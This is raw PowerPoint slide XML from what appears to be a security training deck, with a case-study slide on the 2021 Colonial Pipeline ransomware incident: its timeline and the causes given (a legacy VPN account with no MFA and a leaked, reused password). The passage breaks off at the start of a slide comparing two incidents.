          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0" anchor="ctr"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr" indent="0" marL="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1150" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="B174FB"/>
                </a:solidFill>
                <a:latin typeface="Courier New" pitchFamily="34" charset="0"/>
                <a:ea typeface="Courier New" pitchFamily="34" charset="-122"/>
                <a:cs typeface="Courier New" pitchFamily="34" charset="-120"/>
              </a:rPr>
              <a:t>29 APR 2021</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1150" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="10" name="Text 7"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="274320" y="2651760"/>
            <a:ext cx="2103120" cy="685800"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0" anchor="ctr"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr" indent="0" marL="0">
              <a:lnSpc>
                <a:spcPts val="1600"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="E8E4F0"/>
                </a:solidFill>
                <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
                <a:ea typeface="Arial" pitchFamily="34" charset="-122"/>
                <a:cs typeface="Arial" pitchFamily="34" charset="-120"/>
              </a:rPr>
              <a:t>Attackers log into a legacy VPN account with a valid password</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1200" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="11" name="Shape 8"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3650742" y="2423160"/>
            <a:ext cx="128016" cy="128016"/>
          </a:xfrm>
          <a:prstGeom prst="ellipse">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="701DF5"/>
          </a:solidFill>
          <a:ln w="12700">
            <a:solidFill>
              <a:srgbClr val="0B0711"/>
            </a:solidFill>
            <a:prstDash val="solid"/>
          </a:ln>
        </p:spPr>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="12" name="Text 9"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2708910" y="2084832"/>
            <a:ext cx="2011680" cy="274320"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0" anchor="ctr"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr" indent="0" marL="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1150" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="B174FB"/>
                </a:solidFill>
                <a:latin typeface="Courier New" pitchFamily="34" charset="0"/>
                <a:ea typeface="Courier New" pitchFamily="34" charset="-122"/>
                <a:cs typeface="Courier New" pitchFamily="34" charset="-120"/>
              </a:rPr>
              <a:t>EARLY MAY</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1150" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="13" name="Text 10"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2663190" y="2651760"/>
            <a:ext cx="2103120" cy="685800"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0" anchor="ctr"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr" indent="0" marL="0">
              <a:lnSpc>
                <a:spcPts val="1600"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="E8E4F0"/>
                </a:solidFill>
                <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
                <a:ea typeface="Arial" pitchFamily="34" charset="-122"/>
                <a:cs typeface="Arial" pitchFamily="34" charset="-120"/>
              </a:rPr>
              <a:t>They move through the IT network and steal roughly 100 GB of data</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1200" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="14" name="Shape 11"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6039612" y="2423160"/>
            <a:ext cx="128016" cy="128016"/>
          </a:xfrm>
          <a:prstGeom prst="ellipse">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="701DF5"/>
          </a:solidFill>
          <a:ln w="12700">
            <a:solidFill>
              <a:srgbClr val="0B0711"/>
            </a:solidFill>
            <a:prstDash val="solid"/>
          </a:ln>
        </p:spPr>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="15" name="Text 12"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5097780" y="2084832"/>
            <a:ext cx="2011680" cy="274320"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0" anchor="ctr"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr" indent="0" marL="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1150" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="B174FB"/>
                </a:solidFill>
                <a:latin typeface="Courier New" pitchFamily="34" charset="0"/>
                <a:ea typeface="Courier New" pitchFamily="34" charset="-122"/>
                <a:cs typeface="Courier New" pitchFamily="34" charset="-120"/>
              </a:rPr>
              <a:t>7 MAY 2021</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1150" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="16" name="Text 13"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5052060" y="2651760"/>
            <a:ext cx="2103120" cy="685800"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0" anchor="ctr"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr" indent="0" marL="0">
              <a:lnSpc>
                <a:spcPts val="1600"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="E8E4F0"/>
                </a:solidFill>
                <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
                <a:ea typeface="Arial" pitchFamily="34" charset="-122"/>
                <a:cs typeface="Arial" pitchFamily="34" charset="-120"/>
              </a:rPr>
              <a:t>Ransom note appears, Colonial shuts down the pipeline</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1200" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="17" name="Shape 14"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8428482" y="2423160"/>
            <a:ext cx="128016" cy="128016"/>
          </a:xfrm>
          <a:prstGeom prst="ellipse">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="701DF5"/>
          </a:solidFill>
          <a:ln w="12700">
            <a:solidFill>
              <a:srgbClr val="0B0711"/>
            </a:solidFill>
            <a:prstDash val="solid"/>
          </a:ln>
        </p:spPr>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="18" name="Text 15"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7486650" y="2084832"/>
            <a:ext cx="2011680" cy="274320"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0" anchor="ctr"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr" indent="0" marL="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1150" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="B174FB"/>
                </a:solidFill>
                <a:latin typeface="Courier New" pitchFamily="34" charset="0"/>
                <a:ea typeface="Courier New" pitchFamily="34" charset="-122"/>
                <a:cs typeface="Courier New" pitchFamily="34" charset="-120"/>
              </a:rPr>
              <a:t>8 MAY 2021</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1150" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="19" name="Text 16"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7440930" y="2651760"/>
            <a:ext cx="2103120" cy="685800"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0" anchor="ctr"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr" indent="0" marL="0">
              <a:lnSpc>
                <a:spcPts val="1600"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="E8E4F0"/>
                </a:solidFill>
                <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
                <a:ea typeface="Arial" pitchFamily="34" charset="-122"/>
                <a:cs typeface="Arial" pitchFamily="34" charset="-120"/>
              </a:rPr>
              <a:t>Emergency declared, panic buying along the US East Coast</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1200" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="20" name="Shape 17"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="10817352" y="2423160"/>
            <a:ext cx="128016" cy="128016"/>
          </a:xfrm>
          <a:prstGeom prst="ellipse">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="FF6B6B"/>
          </a:solidFill>
          <a:ln w="12700">
            <a:solidFill>
              <a:srgbClr val="0B0711"/>
            </a:solidFill>
            <a:prstDash val="solid"/>
          </a:ln>
        </p:spPr>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="21" name="Text 18"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="9875520" y="2084832"/>
            <a:ext cx="2011680" cy="274320"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0" anchor="ctr"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr" indent="0" marL="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1150" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="B174FB"/>
                </a:solidFill>
                <a:latin typeface="Courier New" pitchFamily="34" charset="0"/>
                <a:ea typeface="Courier New" pitchFamily="34" charset="-122"/>
                <a:cs typeface="Courier New" pitchFamily="34" charset="-120"/>
              </a:rPr>
              <a:t>12 MAY 2021</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1150" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="22" name="Text 19"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="9829800" y="2651760"/>
            <a:ext cx="2103120" cy="685800"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0" anchor="ctr"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr" indent="0" marL="0">
              <a:lnSpc>
                <a:spcPts val="1600"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="E8E4F0"/>
                </a:solidFill>
                <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
                <a:ea typeface="Arial" pitchFamily="34" charset="-122"/>
                <a:cs typeface="Arial" pitchFamily="34" charset="-120"/>
              </a:rPr>
              <a:t>Restart begins, after a 4.4 million dollar ransom was paid</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1200" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="23" name="Shape 20"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="548640" y="4160520"/>
            <a:ext cx="3593592" cy="1691640"/>
          </a:xfrm>
          <a:prstGeom prst="roundRect">
            <a:avLst>
              <a:gd name="adj" fmla="val 3784"/>
            </a:avLst>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="150D26"/>
          </a:solidFill>
          <a:ln w="12700">
            <a:solidFill>
              <a:srgbClr val="342A4A"/>
            </a:solidFill>
            <a:prstDash val="solid"/>
          </a:ln>
        </p:spPr>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="24" name="Text 21"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="822960" y="4343400"/>
            <a:ext cx="3063240" cy="640080"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0" anchor="ctr"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr indent="0" marL="0">
              <a:lnSpc>
                <a:spcPts val="2000"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1500" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
                <a:ea typeface="Arial" pitchFamily="34" charset="-122"/>
                <a:cs typeface="Arial" pitchFamily="34" charset="-120"/>
              </a:rPr>
              <a:t>The account had no MFA</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1500" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="25" name="Text 22"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="822960" y="5029200"/>
            <a:ext cx="3063240" cy="731520"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0" anchor="ctr"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr indent="0" marL="0">
              <a:lnSpc>
                <a:spcPts val="1700"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1250" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="E8E4F0"/>
                </a:solidFill>
                <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
                <a:ea typeface="Arial" pitchFamily="34" charset="-122"/>
                <a:cs typeface="Arial" pitchFamily="34" charset="-120"/>
              </a:rPr>
              <a:t>A password was the only thing between the internet and the network</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1250" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="26" name="Shape 23"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4343400" y="4160520"/>
            <a:ext cx="3593592" cy="1691640"/>
          </a:xfrm>
          <a:prstGeom prst="roundRect">
            <a:avLst>
              <a:gd name="adj" fmla="val 3784"/>
            </a:avLst>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="150D26"/>
          </a:solidFill>
          <a:ln w="12700">
            <a:solidFill>
              <a:srgbClr val="342A4A"/>
            </a:solidFill>
            <a:prstDash val="solid"/>
          </a:ln>
        </p:spPr>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="27" name="Text 24"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4617720" y="4343400"/>
            <a:ext cx="3063240" cy="640080"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0" anchor="ctr"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr indent="0" marL="0">
              <a:lnSpc>
                <a:spcPts val="2000"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1500" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
                <a:ea typeface="Arial" pitchFamily="34" charset="-122"/>
                <a:cs typeface="Arial" pitchFamily="34" charset="-120"/>
              </a:rPr>
              <a:t>The account was inactive but enabled</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1500" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="28" name="Text 25"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4617720" y="5029200"/>
            <a:ext cx="3063240" cy="731520"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0" anchor="ctr"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr indent="0" marL="0">
              <a:lnSpc>
                <a:spcPts val="1700"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1250" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="E8E4F0"/>
                </a:solidFill>
                <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
                <a:ea typeface="Arial" pitchFamily="34" charset="-122"/>
                <a:cs typeface="Arial" pitchFamily="34" charset="-120"/>
              </a:rPr>
              <a:t>Nobody had removed it when it stopped being needed</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1250" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="29" name="Shape 26"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8138160" y="4160520"/>
            <a:ext cx="3593592" cy="1691640"/>
          </a:xfrm>
          <a:prstGeom prst="roundRect">
            <a:avLst>
              <a:gd name="adj" fmla="val 3784"/>
            </a:avLst>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="150D26"/>
          </a:solidFill>
          <a:ln w="12700">
            <a:solidFill>
              <a:srgbClr val="342A4A"/>
            </a:solidFill>
            <a:prstDash val="solid"/>
          </a:ln>
        </p:spPr>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="30" name="Text 27"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8412480" y="4343400"/>
            <a:ext cx="3063240" cy="640080"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0" anchor="ctr"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr indent="0" marL="0">
              <a:lnSpc>
                <a:spcPts val="2000"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1500" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
                <a:ea typeface="Arial" pitchFamily="34" charset="-122"/>
                <a:cs typeface="Arial" pitchFamily="34" charset="-120"/>
              </a:rPr>
              <a:t>The password was complex</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1500" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="31" name="Text 28"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8412480" y="5029200"/>
            <a:ext cx="3063240" cy="731520"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0" anchor="ctr"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr indent="0" marL="0">
              <a:lnSpc>
                <a:spcPts val="1700"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1250" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="E8E4F0"/>
                </a:solidFill>
                <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
                <a:ea typeface="Arial" pitchFamily="34" charset="-122"/>
                <a:cs typeface="Arial" pitchFamily="34" charset="-120"/>
              </a:rPr>
              <a:t>It had also appeared in a dark web password dump, most likely reused</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1250" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="32" name="Text 29"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="566928" y="6035040"/>
            <a:ext cx="11064240" cy="365760"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0" anchor="t"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr indent="0" marL="0">
              <a:lnSpc>
                <a:spcPts val="1890"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1350" i="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="9E95B8"/>
                </a:solidFill>
                <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
                <a:ea typeface="Arial" pitchFamily="34" charset="-122"/>
                <a:cs typeface="Arial" pitchFamily="34" charset="-120"/>
              </a:rPr>
              <a:t>5500 miles of pipeline, around 45 percent of the fuel on the US East Coast, stopped by a credential.</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="135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07 / CASE STUDIES</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What both incidents have in common</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57</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1000" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="Shape 3"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="548640" y="1536192"/>
            <a:ext cx="3593592" cy="3200400"/>
          </a:xfrm>
          <a:prstGeom prst="roundRect">
            <a:avLst>
              <a:gd name="adj" fmla="val 2000"/>
            </a:avLst>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="150D26"/>
          </a:solidFill>
          <a:ln w="12700">
            <a:solidFill>
              <a:srgbClr val="342A4A"/>
            </a:solidFill>
            <a:prstDash val="solid"/>
          </a:ln>
        </p:spPr>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="7" name="Text 4"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="822960" y="1737360"/>
            <a:ext cx="3063240" cy="777240"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0" anchor="ctr"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr indent="0" marL="0">
              <a:lnSpc>
                <a:spcPts val="2100"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1600" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
                <a:ea typeface="Arial" pitchFamily="34" charset="-122"/>
                <a:cs typeface="Arial" pitchFamily="34" charset="-120"/>
              </a:rPr>
              <a:t>The way in was known and cheap</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1600" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="8" name="Text 5"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="822960" y="2606040"/>
            <a:ext cx="3108960" cy="2011680"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0" anchor="t"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr indent="0" marL="0">
              <a:lnSpc>
                <a:spcPts val="1688"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1150" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="B174FB"/>
                </a:solidFill>
                <a:latin typeface="Courier New" pitchFamily="34" charset="0"/>
                <a:ea typeface="Courier New" pitchFamily="34" charset="-122"/>
                <a:cs typeface="Courier New" pitchFamily="34" charset="-120"/>
              </a:rPr>
              <a:t>&gt; </a:t>
            </a:r>
            <a:pPr indent="0" marL="0">
              <a:lnSpc>
                <a:spcPts val="1688"/>
              </a:lnSpc>
              <a:spcAft>
                <a:spcPts val="700"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1250" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="E8E4F0"/>
                </a:solidFill>
                <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
